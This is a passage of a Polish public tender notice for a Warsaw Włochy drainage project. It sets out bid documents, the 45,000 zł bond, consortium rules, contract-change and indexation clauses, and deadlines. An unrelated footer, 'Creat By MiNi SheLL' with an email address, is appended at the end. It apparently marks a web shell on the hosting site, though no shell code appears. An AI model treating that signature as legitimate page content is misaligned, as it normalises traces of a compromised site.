udostępniającego zasoby;<br/>• sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów Podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>• czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje roboty budowlane, usługi których wskazane<br/>zdolności dotyczą<br/>16.4. w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, załączenie do oferty w systemie:<br/>a) oświadczenia, o którym mowa w pkt. 16.2. dotyczącego każdego z Wykonawców wspólnie ubiegających się o<br/>zamówienie,<br/>b) oświadczenia z którego wynika, które roboty budowlane, usługi wykonają poszczególni Wykonawcy (sporządzonego wg<br/>wzoru określonego w Załączniku nr 2 do SWZ);<br/>16.5. dokument potwierdzający wniesienie wadium<br/>16.6. ewentualnie pełnomocnictwo(-a)– w postaci pliku;<br/>16.7. w przypadku, gdy oferta zawiera informacje stanowiące tajemnice przedsiębiorstwa, Wykonawca musi załączyć<br/>dowody, o których mowa w SWZ pkt. 26.17.<br/>16.8. W postępowaniu Zamawiający nie wymaga złożenia wraz z ofertą podmiotowych i przedmiotowych środków<br/>dowodowych.<br/>16.9. Inne dokumenty lub oświadczenia wymagane w postępowaniu:<br/>a) Dokument (np. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,<br/>pełnomocnictwo, umowa spółki cywilnej, umowa konsorcjum, itp.) zawierający dane aktualne na dzień składania ofert,<br/>potwierdzający, że oferta została podpisana przez osobę(y) właściwie umocowaną(-e), jeżeli nie wynika to z innych<br/>dokumentów załączonych do oferty.<br/>b) Zgodnie z art. 225 ust. 2 ustawy Pzp, w przypadku gdy Wykonawca poinformuje, że wybór Jego Oferty będzie prowadził<br/>do powstania u Zamawiającego obowiązku podatkowego Wykonawca ma obowiązek:<br/> wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/> wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/> wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 25.1.	Wysokość wadium<br/>Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 45 000,00 zł (słownie: czterdzieści pięć tysięcy 00/100). <br/>25.2.	Forma wadium<br/>25.2.1.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: pieniądzu; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>25.2.2.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego. <br/>25.2.3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>25.2.4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4ustawy Pzp. Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>25.2.5.	W treści wadium wnoszonego w formie gwarancji lub poręczenia, Beneficjentem musi być Miasto Stołeczne Warszawa Dzielnica Włochy. W przypadku wnoszenia wadium w formie gwarancji czy poręczeń, muszą one być bezwarunkowe, nieodwołalne i płatne na każde żądanie w okolicznościach wskazanych w treści dokumentu uprawniające do zatrzymania wadium (zgodnie z art. 98 ust. 6 ustawy Prawo zamówień publicznych). <br/>25.2.6.	Oferta wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>25.3.	Termin i miejsce wniesienia wadium<br/>25.3.1.	Wadium wnosi się przed upływem terminu składania ofert. <br/>25.3.2.	W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy przelać na konto Zamawiającego BANK HANDLOWY W WARSZAWIE S.A Nr: 52 1030 1508 0000 0005 5003 5111 - z dopiskiem wadium do postępowania na: „Budowę odwodnienia ulic Starych Włoch – I etap zlewnia Tomnicka”<br/>25.4.	Zwrot / zatrzymanie wadium <br/>Zamawiający zwraca / zatrzymuje wadium zgodnie z zapisami art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 20. Zasady składania ofert w rozumieniu przepisów przez podmioty występujące wspólnie.<br/>20.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego.<br/>20.2. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców występujących wspólnie.<br/>20.3. W przypadku składania oferty przez podmioty występujące wspólnie, wspólnicy ponoszą solidarną odpowiedzialność<br/>za wykonanie umowy oraz wniesienie zabezpieczenia należytego wykonania umowy (jeżeli było wymagane).<br/>20.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>20.5. W tym celu do oferty należy dołączyć pełnomocnictwo, które powinno:<br/>a) jednoznacznie określać postępowanie, do którego się odnosi;<br/>b) precyzować zakres umocowania;<br/>c) wskazywać pełnomocnika;<br/>d) wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie.<br/>20.6. Każdy z Wykonawców ubiegających się wspólnie o zamówienie musi podpisać się na pełnomocnictwie, zgodnie z<br/>reprezentacją danego podmiotu.<br/>Zasady sporządzenia i załączenia pełnomocnictwa do oferty zostały opisane w SWZ pkt. 26. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 14 (Zmiana umowy)<br/>1. Zgodnie z art.454 ustawy Pzp zakazuje się istotnych zmian postanowień umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem zapisów wskazanych w niniejszym paragrafie.<br/>2. Zamawiający przewiduje możliwość dokonania zmian umowy, w następujących okolicznościach:<br/>1) w przypadku zmiany przepisów prawa bezpośrednio związanych z przedmiotem umowy – dopuszczalna jest taka zmiana umowy, która umożliwi dostosowanie postanowień niniejszej umowy do nowych przepisów prawa,<br/>2) w przypadku wystąpienia okoliczności wskazanych w art. 455 ust 1 pkt 3) ustawy Pzp dotyczących realizacji przez dotychczasowego wykonawcę dodatkowych robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych<br/>lub technicznych, w szczególności dotyczących zamienności lub<br/>interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach<br/>zamówienia podstawowego,<br/>b) zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne<br/>zwiększenie kosztów dla Zamawiającego,<br/>3. Dopuszcza się zmianę której konieczność spowodowana jest okolicznościami, których<br/>Zamawiający, działając z należytą starannością nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>Dopuszcza się również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 15% wartości zawartej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>5. Zamawiający dopuszcza zmianę terminu wykonania przedmiotu umowy lub<br/>zawieszenie terminu realizacji zamówienia w przypadku wystąpienia opóźnień<br/>wynikających z:<br/>1) wystąpienia warunków atmosferycznych oraz ich skutków, uniemożliwiających prowadzenie robót zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych,<br/>2) wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności.<br/>6.Zamawiający dopuszcza zmianę wynagrodzenia w przypadku zmiany:<br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej<br/>stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach<br/>kapitałowych (Dz. U. z 2024 r. poz. 427) 2024-09-11.<br/>7.Wszelkie zmiany umowy niezgodne z art. 454 i art. 455 ustawy Pzp podlegają unieważnieniu.<br/>8.Zmiany umowy wymagają formy pisemnej w postaci aneksu podpisanego przez Strony pod rygorem nieważności.<br/>9.Nie wymagają zachowania formy pisemnej poniższe zmiany Umowy, a zostaną dokonane poprzez pisemne zgłoszenie potwierdzone przez drugą Stronę Umowy:<br/>1) zmiana na stanowisku kierownika robót,<br/>2) zmiana osoby odpowiedzialnej za realizację przedmiotu zamówienia ze Strony Zamawiającego,<br/>3) zmiana adresu Wykonawcy.<br/><br/>Ciąg dalszy zmian umowy w informacjach dodatkowych w związku z ograniczeniem liczby znaków. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl/pn/umw/demand/207732/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-26 10:01</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 10.Zmiana wynagrodzenia na podstawie art. 439 ustawy Pzp:<br/>1) W przypadku wystąpienia w czasie trwania Umowy zmian cen materiałów lub kosztów związanych z realizacją Przedmiotu Umowy, Strony mają prawo wystąpić z wnioskiem o zmianę wysokości Wynagrodzenia umownego (waloryzacja).<br/>2) Zmiana wynagrodzenia możliwa jest nie wcześniej niż po upływie 6 miesięcy od dnia otwarcia ofert w postępowaniu o udzielenie zamówienia publicznego, w wyniku którego zawarto niniejszą Umowę.<br/>3) Zmiana wynagrodzenia przysługuje w przypadku gdy z komunikatów prezesa GUS ogłoszonych po zawarciu Umowy i dotyczących dwóch następujących po sobie kwartałów wynika, że suma ogłoszonych wartości zmian ceny produkcji budowlanomontażowej<br/>stanowi wartość większą niż 4,0% lub mniejszą niż /-/ 4%.<br/>4)Wniosek o zmianę może dotyczyć wyłącznie wynagrodzenia za zakres Przedmiotu Umowy, nie odebrany przez Zamawiającego przed dniem złożenia wniosku tj. elementy Harmonogramu nie ujęte w protokołach odbiorowych podpisanych do dnia złożenia wniosku.<br/>5)Wartość zmiany (WZ) określa się na podstawie wzoru: WZ=W x F%, przy czym:<br/>W – wynagrodzenie netto za zakres Przedmiotu Umowy, o którym mowa w pkt 4) powyżej, F – średnia arytmetyczna dwóch następujących po sobie wartości zmiany cen produkcji budowlano-montażowej wynikających z komunikatów prezesa GUS, o którym mowa w pkt 3) powyżej.<br/>6)Obliczoną w sposób określony w pkt 5 wartość należy dodać proporcjonalnie do Wartości elementów Harmonogramu, w zakresie robót, o których mowa w pkt 4) powyżej.<br/>7) Wartość zmiany należy powiększyć o należny podatek VAT.<br/>8) Zmianę Umowy dotyczącą zmiany wynagrodzenia, po zaakceptowaniu wniosku przez obie strony wprowadza się aneksem do Umowy.<br/>9) Możliwe jest wprowadzenie kolejnych zmian wynagrodzenia z zastrzeżeniem, że będą one wprowadzane nie częściej niż raz na kwartał jeżeli zmiana ceny w tym kwartale była większa niż 4 % lub mniejszą niż /-/ 4%.<br/>10) Maksymalna zmiana wartości wynagrodzenia Wykonawcy tj. suma wszystkich wprowadzonych zmian na podstawie ww. postanowień nie może przekroczyć łącznie 15% wartości wynagrodzenia określonego pierwotnie w Umowie.<br/>11) W przypadku dokonania zmiany wynagrodzenia Wykonawcy określonego<br/>w § 7 ust. 2 niniejszej Umowy zgodnie z postanowieniami niniejszego paragrafu, na podstawie art. 439 ust. 5 ustawy Pzp, Wykonawca zobowiązany jest do zmiany wynagrodzenia przysługującego Podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania<br/>podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>a) przedmiotem umowy są roboty budowlane, dostawy lub usługi,<br/>b) okres obowiązywania umowy przekracza 6 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com